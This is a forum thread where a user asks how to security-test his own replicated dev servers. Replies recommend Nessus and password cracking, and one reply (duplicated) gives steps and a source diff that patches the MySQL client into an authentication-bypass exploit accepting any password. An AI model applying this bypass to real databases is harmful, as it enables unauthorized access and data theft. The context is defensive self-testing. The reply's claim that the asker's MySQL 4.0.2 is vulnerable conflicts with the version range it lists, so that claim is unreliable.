chigs20
asked on
How to hack my server
To all,
I would like to try to hack our dev servers (they are a replication of our producution servers). We have implemented several new layers of security including a Cisco Pix 501 firewall and IPTables. But I am hoping somebody can shed some light on how I would go about trying to hack my own server to ensure they are secure. We already do port scaning to ensure there aren't any extra open ports that aren't being used. Are there applications that I can use for password hacking? etc. Thanks for the help in advance.
Specs: (Three tier architecture)
RH 9.0
Apache 2.0.40
MySQL 4.0.2
Jrun4 w/ CFMX
I would like to try to hack our dev servers (they are a replication of our producution servers). We have implemented several new layers of security including a Cisco Pix 501 firewall and IPTables. But I am hoping somebody can shed some light on how I would go about trying to hack my own server to ensure they are secure. We already do port scaning to ensure there aren't any extra open ports that aren't being used. Are there applications that I can use for password hacking? etc. Thanks for the help in advance.
Specs: (Three tier architecture)
RH 9.0
Apache 2.0.40
MySQL 4.0.2
Jrun4 w/ CFMX
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Give nessus a go. http://www.nessus.org/
The version of MySQL is vulnerble to a NULL password:
Vulnerable Systems:
* MySQL version 4.1 up to but not including 4.1.3
* MySQL version 5.0
Immune Systems:
* MySQL version 4.1.3
The diff patch can only be used against the latest alpha version (5.0.0) of MySQL. In order to use it, follow the following steps:
* Download and unpack the MySQL 5.0.0-alpha source
* Patch the sql-common/client.c file:
sql-common/ $ patch client.c mysql.authentication.bypas s_client.c .diff
* Configure and Make as usual
The resultant MySQL client binary can then be used normally but with one exception: The user can completely disregard the password and in fact can enter any password and it would not matter. The provided diff patch:
1941,1956c1941,1942
< if (passwd[0])
< {
< if (mysql->server_capabilitie s & CLIENT_SECURE_CONNECTION)
< {
< *end++= SCRAMBLE_LENGTH;
< scramble(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH;
< }
< else
< {
< scramble_323(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH_323 + 1;
< }
< }
< else
< *end++= '\0'; /* empty password */
---
> sprintf(end,"\x14\x00");
> end+=2;
also to check your security use a password crack on your own system see if it can crack them
Vulnerable Systems:
* MySQL version 4.1 up to but not including 4.1.3
* MySQL version 5.0
Immune Systems:
* MySQL version 4.1.3
The diff patch can only be used against the latest alpha version (5.0.0) of MySQL. In order to use it, follow the following steps:
* Download and unpack the MySQL 5.0.0-alpha source
* Patch the sql-common/client.c file:
sql-common/ $ patch client.c mysql.authentication.bypas
* Configure and Make as usual
The resultant MySQL client binary can then be used normally but with one exception: The user can completely disregard the password and in fact can enter any password and it would not matter. The provided diff patch:
1941,1956c1941,1942
< if (passwd[0])
< {
< if (mysql->server_capabilitie
< {
< *end++= SCRAMBLE_LENGTH;
< scramble(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH;
< }
< else
< {
< scramble_323(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH_323 + 1;
< }
< }
< else
< *end++= '\0'; /* empty password */
---
> sprintf(end,"\x14\x00");
> end+=2;
also to check your security use a password crack on your own system see if it can crack them
just tell us your ip ;)
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.